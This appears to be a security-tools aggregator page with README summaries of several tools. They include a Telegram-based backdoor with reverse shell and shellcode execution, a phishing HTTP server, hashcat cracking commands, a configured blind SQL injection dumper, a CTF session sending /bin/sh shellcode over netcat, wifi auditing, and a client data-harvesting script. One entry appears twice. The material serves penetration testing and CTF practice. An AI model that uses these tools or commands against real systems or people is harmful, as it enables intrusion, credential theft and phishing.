Blaze Telegram Backdoor Toolkit - Bt2

bt2 is a Python-based backdoor in form of a IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C.

Dependencies

• Telepot
• requests

Installation


$ sudo pip install telepot $ sudo pip install requestsPS: Telepot requires minimum of requests 2.9.1 to work properly.

Limitations

Currently the shellcode execution component is dependent on ctypes and works only on Windows platforms.

Usage

Before using this code one has to register a bot with Telegram. This can be done by talking to Botfather - after setting up the name for the bot and username you will get a key that will be used to interact with the bot API.
For more information see Telegram bots: an introduction for developers
Also, it is highly advisable to replace 'botmaster ID' with the ID of the master, locking the communication between the bot to the specific ID of the botmaster to avoid abuse from unauthorized parties.


$ python bt2.py

Resources

We published a blog post with a few more details on command and control platforms and how to use the tool: https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/

Known bugs

• After launching a reverse shell and exiting from it, all commands sent to the bot have duplicate responses.
• The 'kill' functionality is not working as it should.
• After successful execution of shellcode, the bot dies. Upon return it fetches the previous messages from the server and executes the shellcode again. Need to find a way to avoid fetching of previous messages.

Author

• Julio Cesar Fort - julio at blazeinfosec dot com
• Twitter: @juliocesarfort / @blazeinfosec

Download Bt2

Read More

Black Box vBulletin Vulnerability Scanner Tool - OWASP VBScan 0.1.6

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them .

Why OWASP VBScan ?

If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

• Project Leader : Mohammad Reza Espargham
• Github : https://github.com/rezasp/vbscan/
• SourceForge : https://sourceforge.net/projects/vbscan/
• OWASP Page : https://www.owasp.org/index.php/OWASP_VBScan_Project

Usage :

perl vbscan.pl <target>
perl vbscan.pl http://target.com/vbulletin
perl vbscan.pl --help

Download OWASP VBScan

Read More

Penetration Testing Distribution - BlackArch Linux v2017.06.14

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1410 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

• added new (improved) BlackArch Linux installer
• include linux kernel 4.5.1
• added new blackarch linux installer
• fixed an EFI boot issue
• fixed the well-known i686 boot issue
• added more than 80 new tools
• updated all blackarch tools
• updated all system packages
• updated menu entries for window managers (awesome, fluxbox, openbox)

Installing on top of ArchLinux

BlackArch Linux is compatible with existing/normal Arch installations. It acts as an unofficial user repository. Below you will find instructions on how to install BlackArch in this manner.

# Run https://blackarch.org/strap.sh as root and follow the instructions.
$ curl -O https://blackarch.org/strap.sh
  
# The SHA1 sum should match: 86eb4efb68918dbfdd1e22862a48fda20a8145ff
$ sha1sum strap.sh
  
# Set execute bit
$ chmod +x strap.sh
  
# Run strap.sh
$ sudo ./strap.sh

You may now install tools from the blackarch repository.

# To list all of the available tools, run
$ sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
 
# To install all of the tools, run
$ sudo pacman -S blackarch
  
# To install a category of tools, run
$ sudo pacman -S blackarch-<category>

# To see the blackarch categories, run
$ sudo pacman -Sg | grep blackarch

As part of an alternative method of installation, you can build the blackarch packages from source. You can find the PKGBUILDs on github. To build the entire repo, you can use the blackman tool.
# First, you must install blackman.

If the BlackArch package repository is setup on your machine,

# you can install blackman like:
$ sudo pacman -S blackman

# Download, compile and install package:
$ sudo blackman -i <package>
 
# Download, compile and install whole category
$ sudo blackman -g <group>
  
# Download, compile and install all BlackArch tools
$ sudo blackman -a
  
# To list blackarch categories
$ blackman -l
  
# To list category tools
$ blackman -p <category>                                 

Installing from ISO

You can install BlackArch Linux (packages AND environment) using the Live or Netinstall medium.

# Install blackarch-install-scripts package
$ sudo pacman -S blackarch-install-scripts
  
# Now, you can run and follow the instructions
$ sudo blackarch-install 

Download Black Arch Linux V2017.06.14

Read More

Password cracking rules for Hashcat based on statistics and industry patterns - Hob0Rules

Password cracking rules for Hashcat based on statistics and industry patterns. The following blog posts on passwords explain the statistical signifigance of these rulesets:

• Statistics Will Crack Your Password
• Praetorian Password Cracking Rules Released

Useful wordlists to utilize with these rules have been included in the wordlists directory
Uncompress these with the unfollowing command

gunzip rockyou.txt.gz

hob064

This ruleset contains 64 of the most frequent password patterns used to crack passwords. Need a hash cracked quickly to move on to more testing? Use this list.

hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt

d3adhob0

This ruleset is much more extensive and utilizes many common password structure ideas seen across every industry. Looking to spend several hours to crack many more hashes? Use this list.

hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt

Download Hob0Rules

Read More

HTTP Server for Phishing - Weeman v1.7

HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).

Press

• 1.7 - is out 25-03-2016
• Added profiles
• Weeman framework 0.1 is out !!!
• Added command line options.
• Beautifulsoup dependency removed.

Weeman will do the following steps:

1. Create fake html page.
2. Wait for clients
3. Grab the data (POST).
4. Try to login the client to the original page

The framework

You can use weeman with modules see examples in modules/ , just run the command framework to access the framework.

Write a module for the framework

If you want to write a module please read the modules/. Soon I will write docs for the API.


Profiles

You can load profiles in weeman, for example profile for mobile site and profile for desktop site.
./weeman.py -p mobile.localhost.profile

Requirements

• Python <= 2.7.

Platforms

• Linux (any)
• Mac (Tested)
• Windows (Not supported)

Contributing

Contributions are very welcome!

1. fork the repository
2. clone the repo (git clone git@github.com :USERNAME/weeman.git)
3. make your changes
4. Add yourself in contributors.txt
5. push the repository
6. make a pull request

Thank you - and happy contributing!

Download Weeman

Read More

Blind SQL Injection via Bitshifting - Blind-Sql-Bitshifting

This is a module that performs blind SQL injection by using the bitshifting method to calculate characters instead of guessing them. It requires 7/8 requests per character, depending on the configuration.

Usage

import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

Example configuration:

# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1

The assume_only_ascii option makes the module assume that the characters it's dumping are all ASCII. Since the ASCII charset only goes up to 127 , we can set the first bit to 0 and not worry about calculating it. That's a 12.5% reduction in requests. Testing locally, this yeilded an average speed increase of 15% . Of course this can cause issues when dumping chars that are outside of the ASCII range. By default, it's set to 0 .
Once configured:

    x.exploit()   

This returns a 2-dimensional array, with each sub-array containing a single row, the first being the column headers.
Example output:

    [['id', 'username'], ['1', 'eclipse'], ['2', 'dotcppfile'], ['3', 'Acey'], ['4', 'Wardy'], ['5', 'idek']]   

Optionally, your scripts can then harness the tabulate module to output the data:

from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # This specifies to use the first row as the column headers.
               tablefmt='psql')     # Using the SQL output format. Other formats can be used.

This would output:

+------+------------+
|   id | username   |
|------+------------|
|    1 | eclipse    |
|    2 | dotcppfile |
|    3 | Acey       |
|    4 | Wardy      |
|    5 | idek       |
+------+------------+

Download Blind-Sql-Bitshifting

Read More

HTTP Server for Phishing - Weeman v1.7

HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).

Press

• 1.7 - is out 25-03-2016
• Added profiles
• Weeman framework 0.1 is out !!!
• Added command line options.
• Beautifulsoup dependency removed.

Weeman will do the following steps:

1. Create fake html page.
2. Wait for clients
3. Grab the data (POST).
4. Try to login the client to the original page

The framework

You can use weeman with modules see examples in modules/ , just run the command framework to access the framework.

Write a module for the framework

If you want to write a module please read the modules/. Soon I will write docs for the API.

Profiles

You can load profiles in weeman, for example profile for mobile site and profile for desktop site.

./weeman.py -p mobile.localhost.profile

Requirements

• Python <= 2.7.

Platforms

• Linux (any)
• Mac (Tested)
• Windows (Not supported)

Contributing

Contributions are very welcome!

1. fork the repository
2. clone the repo (git clone git@github.com :USERNAME/weeman.git)
3. make your changes
4. Add yourself in contributors.txt
5. push the repository
6. make a pull request

Download Weeman

Read More

Onion Services Security Scan - OnionScan

The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize.

Go Dependencies

• h12.me/socks - For the Tor SOCKS Proxy connection.
• github.com/xiam/exif - For EXIF data extraction.
• github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies

• libexif-dev on Debian based OS
• libexif-devel on Fedora

Installing

Install OS dependencies

• On Debian based operating systems:

       sudo apt-get install libexif-dev    

• On Fedora based operating systems:

       sudo dnf install libexif-devel    

Grab with go get

    go get github.com/s-rah/onionscan   

Compile/Run from git cloned source

    go install github.com/s-rah/onionscan   

and then run the program in

    ./bin/onionscan   

.
Or, you can just do

    go run github.com/s-rah/onionscan.go   

to execute without compiling.

Running

For a simple report detailing the high, medium and low risk areas found:

    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:

    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:

    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other that

    127.0.0.1:9050   

, then you can use the --torProxyAddress flag:

    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   

Apache mod_status Protection

This should not be news , you should not have it enabled. If you do have it enabled, attacks can:

• Build a better fingerprint of your server, including php and other software versions.
• Determine client IP addresses if you are co-hosting a clearnet site.
• Determine your IP address if your setup allows.
• Determine other sites you are co-hosting.
• Determine how active your site it.
• Find secret or hidden areas of your site
• and much, much more.

Seriously, don't even run the tool, go to your site and check if you have /server-status reachable. If you do, turn it off!

Open Directories

Basic web security 101, if you leave directories open then people are going to scan them, and find interesting things - old versions of images, temp files etc.
Many sites use common structures style/ , images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags

Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.

Server Fingerprint

Sometimes, even without mod_status we can determine if two sites are hosted on the sam infrastructure. We can use the following attributes to make this distinction:

• Server HTTP Header
• Technology Stack (e.g. php, jquery version etc.)
• Website folder layout e.g. do you use /style or /css or do you use wordpress.
• Fingerprints of images
• GPG Versions being used.

Download Onionscan

Read More

Wireless Network Auditing Tool - FruityWifi v2.4

FruityWifi is a wireless network auditing tool. The application can be installed in any Debian based system adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq.

v2.4

• Utils have been added (replaces "ifconfig -a")
• Kali Linux Rolling compatibility issue has been fixed

v2.3

• monitor mode (mon0) has been fixed (new airmon-ng compatibility issue)

v2.2

• Wireless service has been replaced by AP module
• Mobile support has been added
• Bootstrap support has been added
• Token auth has been added
• minor fix

v2.1

• Hostapd Mana support has been added
• Phishing service has been replaced by phishing module
• Karma service has been replaced by karma module
• Sudo has been implemented (replacement for danger)
• Logs path can be changed
• Squid dependencies have been removed from FruityWifi installer
• Phishing dependencies have been removed from FruityWifi installer
• New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
• Domain name can be changed from config panel
• New install options have been added to install-FruityWifi.sh
• Install/Remove have been updated

v2.0 (alpha)

• Web-Interface has been changed (new look and feel, new options).
• Nginx has replaced Apache2 as default webserver.
• Installation script has been updated.
• Config panel has been changed.
• Network interfaces structure has been changed and renamed.
• It is possible to use FruityWifi combining multiple networks and setups.
• Supplicant mode has been added as a module.
• 3G/4G Broadband Mobile has been added as a module.
• FruityWifi HTTP webinterface on port 8000
• FruityWifi HTTPS webinterface on port 8443

v1.9

• Service Karma has been replaced by Karma module
• Service Supplicant has been replaced by nmcli module
• Config page has been updated
• Supplicant config has been changed (nmcli module is required)
• dnspoof host file has been removed from config page (dnsspoof module is required)
• Logs page has been updated
• WSDL has been updated
• Hostapd/Karma has been removed from installer (replaced by Karma module)
• NetworkManager has been removed from installer (replaced by nmcli module)
• install-modules.py has been added (install all modules from console)

v1.8

• WSDL has been added
• new status page has been added
• logs can follow in realtime using the new status page (wsdl)

v1.6

• Dependencies can be installed from module windows
• minor fix

v1.5

• New functions has been added
• Source code has been changed (open file function)
• minor fix

v1.4

• New functions has been added (monitor mode)
• config page has been changed
• minor fix

v1.3

• Directory structure has been changed
• minor fix

v1.2

• Installation script has been updated
• SSLstrip fork (@xtr4nge) has been added (Inject + Tamperer options)
• minor fix

v1.1

• External modules can be installed from modules page
• minor fix

v1.0

• init

Download FruityWifi

Read More

Security CTF Toy Tools - v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:

• Libmagic
• Python3
  • BeautifulSoup
  • Requests
  • filemagic
  • hexdump
  • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:

• Crypto
  
  • Base64
  • Ceasar shift
  • Hashing functions (SHA, MD5)
  • Bits manipulations (XOR, inverse XOR)
  • Usual conversions (bytes, strings, hex)
  • RSA basics (inverse modulo, inverse power, egcd...)
  • Bruteforcing (Dictionnary, custom word)
• Shellcodes
  
  • Shellcode selection and download from Shell-storm repo
  • Shellcode formater
  • Shell{cat,net}: Sending shellcode made easy
  • Automatic padding
• Easy connection support
  
  • Netcat
  • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3

• Lots of fixes again
• Hexeditor (Dump/Rewrite files)
• Unix password bruteforce cracker

1.2

• Lots of documentation/bugs/framework fixes
• Added bruteforce
• Added linux utils
• Began hexeditor
• Shellhack fixes
• Alert messages

1.0

• Lots of documentation fixes
• Lots of bugfixes
• Added shellhack (shellcodes stuff)
• Added crypto utils
• Added network utils
• Fixed project tree

Download V0Lt

Read More

Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers - GEF

GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.

GEF fully relies on GDB API and other Linux specific source of information (such as /proc/pid ). As a consequence, some of the features might not work on custom or harden systems such as GrSec. It has fully support for Python2 and Python3 indifferently (as more and more distro start pushing gdb compiled with Python3 support).

Quick start

Simply make sure you're having a GDB 7.x+ .

 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Then just start playing (for local files):

$ gdb -q /path/to/my/bin
gef> gef help

Or (for remote debugging)

remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 

And

local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

x86

ARM

PowerPC

MIPS

Dependencies

There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install:

• capstone highly recommended
• ROPgadget highly recommended

Note : if you are using GDB with Python3 support, you cannot use ROPgadget as Python3 support has not implemented yet. Capstone and radare2-python will work just fine.
Another note : Capstone is packaged for Python 2 and 3 with pip . So a quick install is

$ pip2 install capstone    # for Python2.x
$ pip3 install capstone    # for Python3.x

And same goes for ropgadget



$ pip[23] install ropgadget

The assemble command relies on the binary rasm2 provided by radare2 .

Download GEF

Read More

Script to collect information to the client side - GetDataReport

Script in PHP+JS for get information of target through a web application, use $_SERVER functions and JS functions for get information of our client.

Plugin (WEBApps)

in some web applications need to collect information from the client to perform tasks with this plugin will be easier to work with the variables you need.

<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP               ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser          ".$data->browser();
echo "<br>Screen height    ".$data->height();
echo "<br>Screen width     ".$data->width();
echo "<br>Java enabled     ".$data->javaenabled();
echo "<br>Cookie enabled   ".$data->cookieenabled();
echo "<br>Language         ".$data->language();
echo "<br>Architecture     ".$data->architecture();
echo "<br>Device           ".$data->device();
echo "<br>Country          ".$data->geo('country');
echo "<br>Region           ".$data->geo('region');
echo "<br>Continent        ".$data->geo('continent');
echo "<br>City             ".$data->geo('city');
echo "<br>Logitude         ".$data->geo('logitude');
echo "<br>Latitude         ".$data->geo('latitude');
echo "<br>Currency         ".$data->geo('currency');
echo "<br>Provetor         ".$data->provetor();
echo "<br>Agent            ".$data->agent();
echo "<br>Referer          ".$data->referer();
echo "<br>Date             ".$data->getdate();


 ?>

Hack (Social engineering)

With this script we can collect information from a target performing a routing and generating an html page report.

        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com

Download GetDataReport

Read More